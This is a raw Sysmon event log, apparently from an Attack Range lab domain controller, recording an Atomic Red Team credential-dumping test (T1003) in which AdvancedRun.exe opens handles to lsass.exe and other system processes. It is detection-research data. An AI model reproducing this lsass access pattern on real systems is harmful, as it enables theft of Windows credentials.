17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003967441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003967440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
